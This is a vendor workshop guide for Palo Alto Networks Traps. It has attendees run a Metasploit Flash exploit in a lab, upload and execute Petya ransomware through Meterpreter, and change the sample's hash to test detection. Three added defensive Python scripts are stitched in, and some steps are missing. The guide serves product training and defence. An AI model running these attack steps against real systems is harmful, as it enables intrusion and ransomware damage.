ULTIMATE
TEST DRIVE:
Advanced Endpoint Protection
Workshop Guide
UTD-AEP 2.2 © 2017 Palo Alto Networks, Inc. | Confidential and Proprietary 20171117
Ultimate Test Drive - Advanced Endpoint Protection
Note: This workshop covers only basic topics and is not a substitute for training classes conducted by
Palo Alto Networks Authorized Training Centers (ATC). Please contact your partner or regional sales
manager for more information on available training and how to register for one near you.
Once the environment has been created, the system will display a welcome page. Click “Start Using This
Environment” to begin using the environment.
This will display a list of all virtual systems that constitute the UTD environment.
Take note of the “Shortcut Menu” at the top of your browser window. You will use this Shortcut Menu
throughout the workshop to switch between the available desktops.
D. Victim Client: This virtual system is identical to the Traps Client system with one exception: it is not
equipped with Traps. You will use this system as the victim of the ransomware attack in our workshop.
E. VM-Series Security Platform: This system is a Palo Alto Networks virtual next-generation firewall.
Review the diagram below to better understand the UTD environment setup.
Note: By default, the desktops used in this UTD are reached through RDP connections tunneled over HTML5 in
the browser, so an HTML5-compatible browser is required.
If you encounter connection issues with any of the desktop interfaces, click the “Reconnect” link in the left-
hand pane of the desktop display to re-establish your connection.
If reconnection to the environment remains unsuccessful, please inform the instructor for further assistance.
End of Activity 1
To complete the first phase of the attack, you will use the Metasploit tool hosted on the Attacker workstation to
prepare a webserver that delivers an exploit to the victim. When the victim clicks a link in a phishing email, he
or she is redirected to the Attacker’s website, where a zero-day Flash Player exploit (CVE-2015-5119)
compromises the victim’s endpoint system.
Once the victim’s system is compromised, the Attacker uploads the ransomware malware to the victim’s
machine and executes it. This process is depicted in the figure below.
Click the “Attacker” link on the Shortcut Menu that lists the available desktop environments in the UTD.
Note: If the Attacker VM GUI is slow, see Appendix 2 for an alternative access method.
In the terminal window, type the following command at the prompt and press the “enter/return” key:
./demo.sh
This will load Metasploit, configure it to listen for incoming connections, and serve the Hacking Team Flash
zero-day exploit to the victim system. This process may take a while, so please be patient.
When Metasploit has completed loading, it should display the following prompt:
“msf exploit(adobe_flash_hacking_team_uaf) >”
The attacker system is now ready and online, waiting for a connection from the victim system.
Note: If using a non-US keyboard layout, you may use the “Virtual Keyboard” in the left-hand pane to send
text.
Click the “Victim Client” link on the Shortcut Menu that lists the available desktop environments in the UTD.
Note: You should not need the credentials for the user associated with the Victim Client. However, if
the system does present you with a login screen on the Victim Client, click the icon associated with the
user “Jen” and supply the password associated with that user (shown above the desktop display area).
This password is “Password1”.
Microsoft Outlook is already open and running on the desktop. An email with the subject line: “Someone has
your password” is selected and displayed in the preview pane.
Click the link “Review Your Devices Now” in the email. This will open Internet Explorer, and after a small delay
(depending on your network speed), display a webpage that resembles the Google account login page.
Click inside the Terminal window that is open on the desktop. Then, press the “enter/return” key a few times to
get a new Metasploit prompt.
Note: If your connection to the Attacker desktop has been severed, click the “Reconnect” link in the left-
hand pane of the desktop display area to re-establish your connection to that environment.
If you see the lock screen, click in that window and hit the Enter/Return key to get a login prompt.
In the Terminal window on the Attacker’s desktop, type the following command to verify that you have an
active Meterpreter session to the Victim Client system:
sessions
This will display a list of all active sessions currently running within Metasploit.
An open session indicates that the Attacker has an active, direct connection to the Victim Client, which he or
she can use to further compromise the system.
Note the “ID” of the active session connected to the Victim Client. This is the “Session ID” that you will need to
enter in the next step; it should be session #1, although that might not be the case if you refreshed the
browser on the Victim Client desktop at any point.
Initiate an interactive session with the Victim Client by entering the following command at the Metasploit
prompt (if the “Session ID” you noted in the previous step was not “1,” remember to substitute your “Session
ID” for the number “1” in this command):
sessions -i 1
This will initiate the interactive session, display the message “Starting interaction with 1,” and change the
prompt to a Meterpreter prompt: “meterpreter>”
At this point, you have connected to the Victim Client and can execute any number of available commands to
exploit the system. To see a list of available commands, simply type “?” and press “enter/return” at the
Meterpreter prompt.
We will not explore the available Meterpreter commands in this exercise, but feel free to scroll up and down
the list to see the available commands. These include commands such as: reboot, shutdown, and
keyscan_start (a keylogger), among others.
The Petya ransomware that is part of this attack sequence already resides on the Attacker machine. Upload it
to the Victim Client by typing the following commands at the Meterpreter prompt:
cd /Windows
upload happy.exe
At this point, Meterpreter should display a message confirming that it successfully uploaded “happy.exe” to the
Victim Client: “uploaded : happy.exe -> happy.exe”
We are now ready to launch our ransomware attack and infect the Victim Client.
Be prepared to switch to the tab for the Victim Client as soon as you enter the following command at the
Meterpreter prompt (in the Attacker Terminal window):
execute -f happy.exe -H
The ransomware will simulate the process of checking the disk on the Victim Client (the CHKDSK process).
However, the counter that indicates the progress will never stop counting.
Click the “Send ctrl+alt+delete” button in the left-hand pane of the Victim Client desktop display to send that
key sequence to the system.
This will display a flashing red and grey “skull and crossbones” image and prompt the user to “PRESS ANY
KEY.”
Click inside the “skull and crossbones” image and press the space bar. This should change the image to a
ransomware warning page, with demands and instructions to submit your payment in order to unlock your
system.
Congratulations! You are simultaneously the attacker and your own victim.
On the Attacker desktop, click inside the Terminal window and press the “enter/return” key a few times to
display a Metasploit prompt.
We no longer need this attacker session, so type the following command to shut down Meterpreter:
exit
This will return you to the Metasploit prompt. Type the following command to shut down Metasploit as well.
exit
This will stop the attacker server and return you to the Terminal prompt.
End of Activity 2
Click the Traps icon on the Windows taskbar at the bottom of the desktop. This should display the Traps client
console, which indicates that “Advanced Endpoint Protection is Enabled.”
Note the date and time of the “Last Check-in” indicated on the bottom of the Traps client console.
Click the “Check In Now” link to reconnect to the Traps Endpoint Security Manager (ESM) backend systems
and retrieve any updated security policies.
The link should change momentarily to “Connecting” and once the Traps client has completed the check-in
process, it should return to “Check In Now.”
At this point, you have verified that Traps is running on the Client desktop.
In the terminal window, type the following command at the prompt and press the “enter/return” key:
./demo.sh
This will load Metasploit, configure it to listen for incoming connections, and serve the Hacking Team Flash
zero-day exploit to the victim system. When Metasploit has completed loading, it should display the following
prompt
The attacker system is now ready and online, waiting for a connection from the victim system.
Click the “Traps Client” tab to display that desktop. This returns you to the Traps Client desktop with the Traps
client console still visible (from Task 1, Step 2 above).
Microsoft Outlook is already open and running, and an email with the subject line: “Someone has your
password” is displayed in the inbox.
Click the link “Review Your Devices Now” in the email. This will open Internet Explorer, and after a small delay
(depending on your network speed), display a webpage that resembles the Google account login website.
Recall from our previous Activity that the Attacker server detects the incoming connection and serves the
SWF file for the Hacking Team zero-day exploit in reply to the request.
At this point, Traps will detect the exploitation attempt, block it, and display a dialog box to inform you that it
has prevented the security breach.
Traps freezes the Internet Explorer processes running in the browser tab, collects forensic data about the
attack, and then terminates the exploitation attempt.
Click “OK” in the Traps notification dialog box to dismiss it. This will close the dialog box and terminate the
Internet Explorer process that was targeted by the exploitation attempt.
Click the “Attacker” tab. This should display the Attacker desktop.
Notice that the Attacker’s system detected the incoming request and served the SWF file that contains the
exploit, but failed to establish an active session to the Traps Client machine.
Click inside the Terminal window on the Attacker desktop and press “enter/return” a few times to get a new
Metasploit prompt: “msf exploit(adobe_flash_hacking_team_uaf) >”
Enter the following command at the Metasploit prompt:
sessions
This should display a response indicating that there are no active sessions.
This verifies that the Attacker’s exploitation attempt failed, despite the fact that the SWF file containing the
Hacking Team Flash zero-day exploit was delivered to the Traps Client machine.
End of Activity 3
Click the “ESM Server” link on the Shortcut Menu that lists the available desktop environments in the UTD.
This will display the ESM Server desktop. The Chrome browser should already be open and displaying the
login prompt for the ESM management console.
If Chrome is not open, simply click the Chrome icon in the Windows Taskbar (on the left of the display) to
launch Chrome. If necessary, click the “ESM Server-Login” shortcut on the Chrome bookmark bar to access
the login prompt.
This should log you in to the console and display the main dashboard.
Click the “Security Events” tab inside the ESM console. This should display a table that summarizes all the
threats reported to the ESM by all endpoint agents.
In our UTD environment, there should be only one security event reported: an exploit prevention, listed in the
row labeled “Exploits.”
At this point, you can simply click the number in the summary table (the red number “1” in our case) to
navigate directly to the exploit prevention event.
Click “Exploits” in the left column of the display, under the “Preventions” heading. This will display all the
exploit prevention events recorded in the ESM.
Notice that you can learn a great deal from the record displayed in the table, even without opening the event
record itself:
• Date and time of the event
• Which computer was affected (Traps Client)
• The IP address of the user
• Who the user was (user Jen on Traps Client)
• What operating system is running on the system (Windows 7)
• What version of the Traps agent is running on the system
• Which process was exploited (iexplore.exe - Internet Explorer)
• What exploit prevention module in Traps prevented the exploitation attempt
Click the record in the table that corresponds to our exploit prevention event. This will display additional details
about the prevention event, including:
• Source Path: the path to the application that was exploited
• Source Version: the version number of the application
• File Quarantine: whether the executable file (iexplore.exe) was quarantined
• Source Signers: who (if any) signed the executable file
Note that you can also display additional details about the prevention event by clicking the “Additional
Information” link in the prevention event record display. Click that link now.
Scroll down in the list of “Recent Files and URIs” and take note of the files and web addresses that were
associated with this ransomware attack. Specifically, notice the web address for the “Attacker” system
displayed in this list (“http://192.168.21.150:8080”). This type of information is critical to forensic investigations,
should you choose to conduct one after Traps prevents an attack.
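The two lists above (the fields visible in the event table, and the “Recent Files and URIs” forensic data) are what an analyst pivots on after a prevention. The following script is an added example, not code from Palo Alto Networks or the ESM: it takes a prevention event record laid out as a Python dict (the layout is an assumption, not the ESM export format), separates local file paths from URIs in the forensic list, resolves each URI to a host and port, flags whether the address is an internal one, and prints a triage summary. The field values are the ones this workshop displays; the timestamp, source path, signer and index.dat path are constructed placeholders.

```python
"""Triage helper for a Traps/ESM-style exploit prevention event.

Added example. The record layout below is a constructed assumption, not the
ESM's real export format; the values mirror what the workshop screens show.
"""
import ipaddress
import re
from urllib.parse import urlsplit

# Constructed prevention event record. Endpoint, user, OS, process and the
# attacker URL come from the workshop; the other values are placeholders.
PREVENTION_EVENT = {
    "time": "2017-11-17 10:32:05",                      # constructed
    "endpoint": "Traps Client",
    "user": "Jen",
    "os": "Windows 7",
    "process": "iexplore.exe",
    "module": "DLL Security",                           # constructed for this record
    "source_path": r"C:\Program Files\Internet Explorer\iexplore.exe",  # constructed
    "source_signers": ["Microsoft Windows"],            # constructed
    "recent_files_and_uris": [
        r"C:\Users\Jen\AppData\Local\Microsoft\Windows\Temporary Internet Files\index.dat",  # constructed
        "http://192.168.21.150:8080",
        "http://192.168.21.150:8080/",                  # constructed duplicate of the same host
    ],
}

# Anything that starts with a scheme ("http://", "file://", ...) is a URI;
# everything else in the forensic list is treated as a local file path.
URI_RE = re.compile(r"^[a-z][a-z0-9+.-]*://", re.IGNORECASE)


def classify_entry(entry: str) -> str:
    return "uri" if URI_RE.match(entry) else "file"


def network_indicators(event: dict) -> list:
    """Return one record per unique (host, port) found in the event's URI entries."""
    seen = {}
    for entry in event["recent_files_and_uris"]:
        if classify_entry(entry) != "uri":
            continue
        parts = urlsplit(entry)
        host = parts.hostname
        port = parts.port or {"http": 80, "https": 443}.get(parts.scheme)
        if (host, port) in seen:
            continue
        try:
            internal = ipaddress.ip_address(host).is_private
        except ValueError:
            internal = False  # a hostname rather than a literal address; resolve separately
        seen[(host, port)] = {
            "scheme": parts.scheme,
            "host": host,
            "port": port,
            "internal": internal,
            "first_url": entry,
        }
    return list(seen.values())


def summarize(event: dict) -> str:
    """Human-readable triage block plus the host:port terms to search for in firewall/proxy logs."""
    indicators = network_indicators(event)
    pivots = sorted({f"{i['host']}:{i['port']}" for i in indicators})
    lines = [
        f"{event['time']} {event['endpoint']} ({event['os']}) user={event['user']}",
        f"  {event['module']} stopped {event['process']} at {event['source_path']}",
        f"  signed by: {', '.join(event['source_signers']) or 'unsigned'}",
        f"  network pivots: {', '.join(pivots) or 'none'}",
    ]
    for i in indicators:
        where = "internal address" if i["internal"] else "external address"
        lines.append(f"    {i['first_url']} -> {where}")
    return "\n".join(lines)


if __name__ == "__main__":
    print(summarize(PREVENTION_EVENT))
```

Deduplicating on (host, port) rather than on the raw URL matters because the same delivery server usually shows up under several paths; the single pivot term 192.168.21.150:8080 is what you would then search for in the VM-Series firewall’s traffic log to find every endpoint that contacted the attacker.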
Traps provides several malware prevention methods, each of which includes multiple, purpose-built
prevention techniques that are tuned for maximum performance and accuracy.
Please refer to the overview presentation that your workshop instructor delivered for an in-depth discussion of
each malware prevention capability.
Click the “Policies” tab inside the ESM console. This should display a table that summarizes the policies
configured in the ESM. You can display the policies for each of “Exploit,” “Malware,” and “Forensics”
capabilities by clicking on the associated link in the column on the left of this display.
Click the “WildFire” link under the “Malware” heading in the left column. This will display a table containing the
default policies for WildFire.
Next, click the “WildFire On” policy in the table, which is the second policy in the list. This will display a
summary of the settings of the policy.
Click the “Edit” button to see how these settings are specified (and modified) in the policy. This will display the
policy settings overlay window.
Feel free to click the other tabs in this display (“Conditions,” “Objects,” and “Name”) to see the additional
conditions and settings that you could specify for each policy of this type.
When you have finished looking at the policy settings, click “Cancel” to close the window.
Click the “Restrictions” link under the “Malware” heading in the left column. This will display a table containing
the Execution Restrictions policies defined in the ESM.
Click the first item in the table, which is a policy named “Prevent Execution from Temp Folders.” This will
expand the display and show you additional details about the specific restrictions included in this policy.
This policy only includes local folder restrictions, but you can specify many other restrictions. Click the “Edit”
button in the policy details view. This will display the “Restrictions” edit window.
Note the various restrictions that you can specify with policies such as this one; they are listed on the left of
the edit window. Click through them to better understand what restrictions are available.
When you have finished reviewing the policy settings, click “Cancel” to close the window.
Click the “Hash Control” link under the “Malware” heading in the left column. This will display a table that lists
all recent file executions (such as “iexplore.exe” and “taskhost.exe”), their hash values, associated WildFire
verdicts, and other relevant information that defines the Admin Override Policies in the ESM. You might need to
change the “First Seen” / “after” search parameter to “First Seen” / “before” to see more entries (click “Search”
on the left to apply the filter).
Click the first item in the table. This will expand the display and show you additional details about the specific
executable file. Notice the buttons in this expanded display that allow you to override or specify any of the
following actions for each executable (due to limitations of the CloudShare environment, you may need to use
the right-arrow key on your keyboard to scroll the display to the right to see all available options):
• Treat as Benign
• Treat as Malware
• WildFire Report
• Recheck Verdict
• Report as Incorrect
Similar to its malware prevention capabilities, Traps provides several exploit prevention methods, each of
which includes multiple, purpose-built prevention techniques that are tuned for maximum performance and
accuracy.
Please refer to the overview presentation that your workshop instructor delivered for an in-depth discussion of
each exploit prevention capability.
Click the “Application Protection Modules” link under the “Exploit” heading in the left column. This will display a
table containing the default exploit prevention policies included with Traps.
This is also where all custom exploit prevention policies will be listed (we will return to this table in a future
Activity).
Click the first policy in the list, labeled “Test Exploit Protection Rule.” This will expand the display and show
additional details about this particular policy.
Click the “Edit” button in the expanded display. This will display the “Exploit Protection Rule” edit window.
Note the various Exploit Protection Modules (EPMs), which correspond to the Traps exploit prevention methods;
they are listed on the left of this edit window.
Flip through the remaining tabs in the edit window to see the additional settings that you can specify for each
exploit prevention policy.
When you have finished viewing the policy settings, click “Cancel” to close the window.
End of Activity 4
Step 1. Access the Traps Client Desktop and Verify Traps is Enabled
You have now verified that Traps is running on the Traps Client desktop.
Click the “Attacker” tab. This should display the Attacker Desktop.
There should be a terminal window already open on the desktop, with Metasploit loaded and displaying the
following prompt:
“msf exploit(adobe_flash_hacking_team_uaf) >”
Click inside the terminal window to activate it. Then press the “enter/return” key a few times to ensure the
Metasploit system is running. If it is not, please reconnect to the Attacker desktop.
At this point, the attacker system is ready and online, waiting for a connection from the victim system.
Click the “Traps Client” tab to display that desktop. This should return you to the Traps Client desktop with the
Traps client console still visible.
This Step repeats the same sequence of actions you completed to trigger the exploitation of the Victim Client
in the previous Activity. This is necessary to observe Traps in action.
Click the Outlook application window to activate it. The email with the subject line: “Someone has your
password” is displayed in the inbox.
Click the link “Review Your Devices Now” in the email. This will open Internet Explorer, and after a small delay
(depending on your network speed), display a webpage that resembles the Google account login website.
At this point, Traps will detect the exploitation attempt, block it, and display a dialog box to inform you that it
has prevented the security breach.
Click “OK” in the Traps notification dialog box to dismiss it. This will close the dialog box and terminate the
Internet Explorer process that was targeted by the exploitation attempt.
Click the first item in the list, which should be associated with the “Traps Client” system, the “iexplore.exe”
process, and the “DLL Security” module. This will display an expanded view of the security event.
Now click the “Create Rule” button. This will display the “Exploitation Protection Rule” edit window and
automatically fill in the necessary information from the security event to create a policy that disables the EPM
(DLL Security, in this case).
Click the “Name” tab in the “Exploit Protection Rule” edit window and take note of the name that is
automatically assigned to this new Policy.
Next, click “Apply” to create and activate this new policy rule. This disables the DLL Security EPM for the
“iexplore.exe” process on the “Traps Client” system.
Verify this rule has been created by clicking the “Policy” tab in the ESM console display. By default, this will
display the Application Protection Modules under the “Exploit” heading of the left navigation column.
Note that the first policy in this table has the following specifications:
• ID: A unique policy identifier assigned to this new policy
• Name: “Exploitation policy from Prevention on Traps Client”
• Description: “DLL Security on iexplore.exe is disabled where Traps Client included”
Be sure to note the ID of this new policy. You will use this information in the next Step.
Click the “Traps Client” tab to display that desktop. This should return you to the Traps Client desktop.
Next, click the icon for Traps in the Windows Taskbar (bottom of the display) to open the Traps client console.
Finally, click the “Check In Now” link on the bottom of the Traps console window to retrieve the policy we just
created in the previous step from the ESM Server.
Once the check-in process is completed, click the “Advanced” link to the right of the “Status” tab on the top
portion of the Traps console window. This will display several additional tabs. Click the “Policy” tab and verify
that the new EPM policy that you created in the previous Step has been applied to the Traps client. The ID
associated with this policy should match the one you noted in the previous Step.
Click “OK” in the Traps prevention alert window to dismiss it. This will also terminate the Internet Explorer
process, as expected.
Click the first item in the list, which should be associated with the “Traps Client” system, the “iexplore.exe”
process, and the “ROP Mitigation” module. This will display an expanded view of the security event.
Now click the “Create Rule” button. This will display the “Exploitation Protection Rule” edit window and
automatically fill in the necessary information from the security event to create a policy that disables the EPM
(ROP Mitigation, in this case).
Simply click “Apply” to create and activate this new policy rule. This disables the ROP Mitigation EPM for the
“iexplore.exe” process on the “Traps Client” system.
Verify this rule has been created by clicking the “Policy” tab in the ESM console display. By default, this will
display the Protection Modules under the “Exploit” heading of the left navigation column.
Note that the first policy in this table has the following specifications:
• Name: “Exploitation policy from Prevention on Traps Client”
• Description: “ROP Mitigation on iexplore.exe is disabled where Traps Client included”
Click the “Traps Client” tab to display that desktop. This should return you to the Traps Client desktop.
Next, click the icon for Traps in the Windows Taskbar (bottom of the display) to open the Traps client console.
The “Policy” tab should be visible (recall that we displayed this tab by clicking the “Advanced” link adjacent to
the “Status” tab in previous Steps).
Finally, click the “Check In Now” link on the bottom of the Traps console window to retrieve the policy we just
created in the previous step from the ESM Server.
Verify that the new EPM policy that you created in the previous Step has been applied to the Traps client.
Notice how the policy name is the same as the one we created in our previous Steps. Ideally, an administrator
would provide a more descriptive name instead of the default name assigned by the system in order to
distinguish policies from one another. We will do that in the next step.
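The point made above (two rules that switch off an EPM and both carry the same system-generated name) is exactly what a periodic policy review should catch. The script below is an added example, not ESM code: it walks a list of exploit protection rules held as Python dicts (a constructed layout; the ESM’s real rule schema may differ), flags every rule that disables an EPM, flags rules still carrying the default “Exploitation policy from Prevention on …” name, reports duplicate names, and proposes a descriptive name in the form this workshop uses later (“Disable JIT Mitigation on Traps Client”). The three rule records mirror the rules created in this Activity; their numeric IDs and the fourth, non-disabling rule are constructed.

```python
"""Audit exploit-protection exception rules for risky or indistinguishable entries.

Added example. Rule records are constructed to mirror the rules the workshop
creates; the IDs are placeholders and the schema is an assumption.
"""
import re
from collections import Counter

# Constructed rule list. Names and descriptions follow the workshop; IDs are placeholders.
RULES = [
    {"id": 101, "name": "Exploitation policy from Prevention on Traps Client",
     "description": "DLL Security on iexplore.exe is disabled where Traps Client included",
     "epm": "DLL Security", "process": "iexplore.exe", "action": "disable", "scope": ["Traps Client"]},
    {"id": 102, "name": "Exploitation policy from Prevention on Traps Client",
     "description": "ROP Mitigation on iexplore.exe is disabled where Traps Client included",
     "epm": "ROP Mitigation", "process": "iexplore.exe", "action": "disable", "scope": ["Traps Client"]},
    {"id": 103, "name": "Disable JIT Mitigation on Traps Client",
     "description": "JIT Mitigation on iexplore.exe is disabled where Traps Client included",
     "epm": "JIT Mitigation", "process": "iexplore.exe", "action": "disable", "scope": ["Traps Client"]},
    # Constructed control case: a rule that enforces rather than disables protection.
    {"id": 104, "name": "Constructed: enforce default EPMs",
     "description": "Constructed rule, all EPMs enabled",
     "epm": None, "process": None, "action": "enable", "scope": ["All"]},
]

# The name the ESM assigns when a rule is created from a prevention event.
DEFAULT_NAME_RE = re.compile(r"^Exploitation policy from Prevention on ")


def rename_suggestion(rule: dict) -> str:
    """Descriptive name in the form the workshop uses for its third rule."""
    return f"Disable {rule['epm']} on {' and '.join(rule['scope'])}"


def audit(rules: list) -> list:
    """Return a list of findings, one dict per (rule, issue)."""
    findings = []
    name_counts = Counter(r["name"] for r in rules)
    for r in rules:
        if r["action"] == "disable":
            # Every disabled EPM is an exception that widens the attack surface of that process.
            findings.append({
                "id": r["id"], "issue": "disables-epm",
                "detail": f"{r['epm']} is off for {r['process']} on {', '.join(r['scope'])}",
            })
            if DEFAULT_NAME_RE.match(r["name"]):
                findings.append({
                    "id": r["id"], "issue": "default-name",
                    "detail": f"rename to '{rename_suggestion(r)}'",
                })
            if "All" in r["scope"]:
                findings.append({
                    "id": r["id"], "issue": "broad-scope",
                    "detail": "an EPM is disabled on every endpoint, not just the one that raised the event",
                })
        if name_counts[r["name"]] > 1:
            findings.append({
                "id": r["id"], "issue": "duplicate-name",
                "detail": f"{name_counts[r['name']]} rules share the name '{r['name']}'",
            })
    return findings


if __name__ == "__main__":
    for f in audit(RULES):
        print(f"rule {f['id']}: {f['issue']}: {f['detail']}")
```

Running this over an export of the Application Protection Modules table before each check-in cycle gives an administrator a short list of exceptions to re-justify, and the duplicate-name finding is what would have caught the situation described in this Step.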
Click “OK” in the Traps prevention alert window to dismiss it. This will also terminate the Internet Explorer
process, as expected.
Click the first item in the list, which should be associated with the “Traps Client” system, the “iexplore.exe”
process, and the “JIT Mitigation” module. This will display an expanded view of the security event.
Now click the “Create Rule” button. This will display the “Exploitation Protection Rule” edit window and fill in
the necessary information from the security event to disable the EPM (JIT Mitigation, in this case).
Click the “Name” tab in the edit window. This will display the “Rule Summary” area. Replace the name for this
rule with “Disable JIT Mitigation on Traps Client.”
Then click “Apply” to create and activate this new policy rule. This disables the JIT Mitigation EPM for the
“iexplore.exe” process on the “Traps Client” system.
Verify this rule has been created by clicking the “Policy” tab in the ESM console display. By default, this will
display the Protection Modules under the “Exploit” heading of the left navigation column.
Note that the first policy in this table has the following specifications:
Click the “Traps Client” tab to display that desktop. This should return you to the Traps Client desktop.
Next, click the icon for Traps in the Windows Taskbar (bottom of the display) to open the Traps client console.
The “Policy” tab should be visible (recall that we displayed this tab by clicking the “Advanced” link adjacent to
the “Status” tab in previous Steps).
Finally, click the “Check In Now” link on the bottom of the Traps console window to retrieve the policy we just
created in the previous step from the ESM Server.
Verify that the new EPM policy that you created in the previous Step (“Disable JIT Mitigation on Traps Client”)
has been applied to the Traps client.
End of Activity 5
Click inside the terminal window to activate it. Then press the “enter/return” key a few times to get a Metasploit
prompt:
At the Metasploit prompt, type the following command to verify that you have an active Meterpreter session to
the Victim Client system:
sessions
This will display a list of all active sessions currently running within Metasploit.
Note the “ID” of the active session with the Traps Client. We will use session ID #1 for the instructions below,
but you should use the number that corresponds to your session ID.
Initiate an interactive session with the Traps Client by entering the following command at the Metasploit
prompt (assuming your session ID is 1):
sessions -i 1
This will initiate the interactive session, display the message “Starting interaction with 1,” and change the
prompt to a Meterpreter prompt: “meterpreter>”
At this point, you have connected with the Traps Client and can now upload your ransomware sample to that
system.
The Petya ransomware that is part of this attack sequence already resides on the Attacker machine. Upload it
to the Traps Client by typing the following commands at the Meterpreter prompt:
cd /Windows
upload happy.exe
At this point, Meterpreter should display a message confirming that it successfully uploaded “happy.exe” to the
Traps Client: “uploaded : happy.exe -> happy.exe”
We are now ready to launch our ransomware attack and infect the Traps Client.
At this point, Meterpreter should indicate that a new process was created and executed on the target system,
Traps Client.
Click the “Traps Client” tab. This should display the Traps Client desktop.
At this point, Traps will either have already identified and blocked this malware, or it will be in the process of
doing so. In either case, you should see a Traps Prevention Alert window open on the Traps Client machine.
The “Prevention Description” field should indicate that Traps blocked this based on a “Suspicious process
detected.” Click the “Show Details” button, then scroll down to the bottom of the list. Notice that the
“Component” referenced here is “WildFire.”
If you recall our review of the sequence of prevention methods in Task 1 of this Activity, Traps has already
conducted the following prevention checks to arrive at this point:
1. Admin Override Policy: None exists, so Traps proceeded to the next step.
2. Trusted Publisher Identification: This executable is not signed, so Traps proceeded to the next step.
3. WildFire Check: This malware is already known to WildFire (as identified by its file hash), so Traps
blocked it.
4. Quarantine: Since the executable file was a known malware, Traps quarantined the file.
Now click the record that corresponds to that security event. This should display additional details about the
security event.
Note that in the “Details” window, it indicates that Traps quarantined the malware (as shown by the entry
“Quarantine: Yes”).
Since this malware has a file hash that is identified as a known malware in the WildFire threat intelligence
cloud (and now in the local cache of this Traps agent and the ESM), Traps will block it every time it attempts
to run.
In order to see the local Static Analysis prevention method, we need to create a malware sample with a file
hash that is unknown to both Traps and WildFire.
Note: If accessing the Attacker VM via SSH, return to Appendix 2 for additional steps.
In the new Terminal window, type the following command to get a listing of all files in the root user’s home directory:
ls
The file “hashchange.sh” will be listed among the files in the root user’s home directory.
In the new Terminal window, type the following command to modify the file hash for the “happy.exe”
ransomware sample:
./hashchange.sh
This will display the 64-character hash value of the file “happy.exe,” add a small segment of random data to
the end of the file, and display the new hash value for the modified file. Note the difference between the hash
values before and after the change.
This malware file is now essentially unknown to Traps and WildFire because it has a new file hash.
In the Attacker desktop window, click inside the initial terminal window that still displays the Meterpreter
prompt (“meterpreter >”). This window should still be visible under the new Terminal window that you used in
the previous Task to modify the ransomware sample.
Upload the modified ransomware sample you created in the previous Task to the Traps Client by typing the
following command at the Meterpreter prompt:
upload happy.exe
At this point, Meterpreter should display a message confirming that it successfully uploaded “happy.exe” to the
Traps Client: “uploaded : happy.exe -> happy.exe”
We are now ready to launch our new ransomware with an unknown file hash to infect the Traps Client.
Click the “Traps Client” tab. This should display the Traps Client desktop.
At this point, Traps will either have already identified and blocked this malware, or it will be in the process of
doing so. In either case, you should see a Traps Prevention Alert window open on the Traps Client machine.
The “Prevention Description” field should again indicate Traps blocked based on a “Suspicious process
detected”. Click the “Show Details” button, then scroll down to the bottom of the list. You will notice the
“Component” referenced here this time is “Local Analysis”.
If you recall our review of the sequence of prevention methods in Task 1 of this Activity, Traps has already
conducted the following prevention checks to arrive at this point:
1. Admin Override Policy: None exists, so Traps proceeded to the next step.
2. Trusted Publisher Identification: This executable is not signed, so Traps proceeded to the next step.
3. WildFire Check: This malware is unknown to WildFire (as identified by its file hash), so Traps
proceeded to the next step.
4. Static Analysis: Static analysis correctly identifies this new malware sample as malicious and blocks
its execution.
5. Quarantine: Since the executable file was identified as malware, Traps quarantined the file.
6. Upload to WildFire for Analysis: Since the executable is unknown to WildFire, Traps uploaded it to
WildFire for full analysis.
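The prevention sequence listed above, and the earlier one for the known-hash case, as an added simulation that is not Palo Alto Networks code: the verdict stores, the static-analysis rule, the hash-change routine and the sample bytes are constructed stand-ins, chosen so that the original sample follows the “WildFire” path and the hash-changed copy follows the “Local Analysis” path with an upload.

```python
import hashlib
import os
from dataclasses import dataclass, field

# Constructed stand-ins for the WildFire cloud verdict store and for the
# local hash cache kept by the Traps agent and the ESM. Keys are SHA-256
# hex digests; values are "malware" or "benign".
WILDFIRE_VERDICTS = {}
LOCAL_CACHE = {}

@dataclass
class Result:
    blocked: bool
    component: str              # the stage that made the decision
    quarantined: bool = False
    uploaded: bool = False
    trace: list = field(default_factory=list)

def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()

def local_analysis(data: bytes) -> bool:
    """Stand-in for the local static analysis engine (hypothetical rule): a
    file carrying the constructed marker is judged malicious. The real engine
    scores many structural features of the executable instead."""
    return b"RANSOM-MARKER" in data

def prevention_sequence(data: bytes, *, signed_by_trusted: bool = False,
                        admin_override: str = None,
                        wildfire_on: bool = True) -> Result:
    """Walk the stages in the order the guide lists them."""
    h = sha256_hex(data)
    trace = []
    # 1. Admin override policy: an explicit "allow"/"block" for this file wins.
    if admin_override is not None:
        trace.append("admin override: " + admin_override)
        return Result(admin_override == "block", "Admin Override", trace=trace)
    trace.append("no admin override")
    # 2. Trusted publisher identification: a trusted signature allows the run.
    if signed_by_trusted:
        trace.append("trusted publisher")
        return Result(False, "Trusted Publisher", trace=trace)
    trace.append("unsigned")
    # Turning WildFire activation off also disables local analysis and
    # quarantine (as the guide notes), so the rest of the chain does not run.
    if not wildfire_on:
        trace.append("wildfire off")
        return Result(False, "None", trace=trace)
    # 3. WildFire check: the local cache answers first, then the cloud verdict.
    verdict = LOCAL_CACHE.get(h) or WILDFIRE_VERDICTS.get(h)
    if verdict is not None:
        LOCAL_CACHE[h] = verdict        # cached, so the next run is decided here
        trace.append("known hash: " + verdict)
        return Result(verdict == "malware", "WildFire",
                      quarantined=(verdict == "malware"), trace=trace)
    trace.append("unknown hash")
    # 4. Local (static) analysis, 5. quarantine on a malicious verdict,
    # 6. upload of the unknown file to WildFire for full analysis.
    malicious = local_analysis(data)
    LOCAL_CACHE[h] = "malware" if malicious else "benign"
    trace.append("local analysis: " + LOCAL_CACHE[h])
    return Result(malicious, "Local Analysis", quarantined=malicious,
                  uploaded=True, trace=trace)

def hashchange(data: bytes, n: int = 16) -> bytes:
    """Same effect as the guide's hashchange.sh: append random bytes so the
    file's hash no longer matches any recorded verdict."""
    return data + os.urandom(n)

# Constructed sample standing in for happy.exe; its hash is seeded as known.
SAMPLE = b"MZ" + b"\x00" * 30 + b"RANSOM-MARKER" + b"\x00" * 30
WILDFIRE_VERDICTS[sha256_hex(SAMPLE)] = "malware"

if __name__ == "__main__":
    for label, f in (("original", SAMPLE), ("hash-changed", hashchange(SAMPLE))):
        r = prevention_sequence(f)
        print(label, sha256_hex(f)[:16], r.component, r.trace)
```

Running the hash-changed copy a second time is decided at the hash stage from the local cache, which is the behaviour the guide describes for the ESM and agent cache.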
If the Traps console is not visible on the desktop, bring it to the forefront by clicking its icon in the Windows
Taskbar. Then click the “Events” tab in the Traps console window. This will display all recent security events
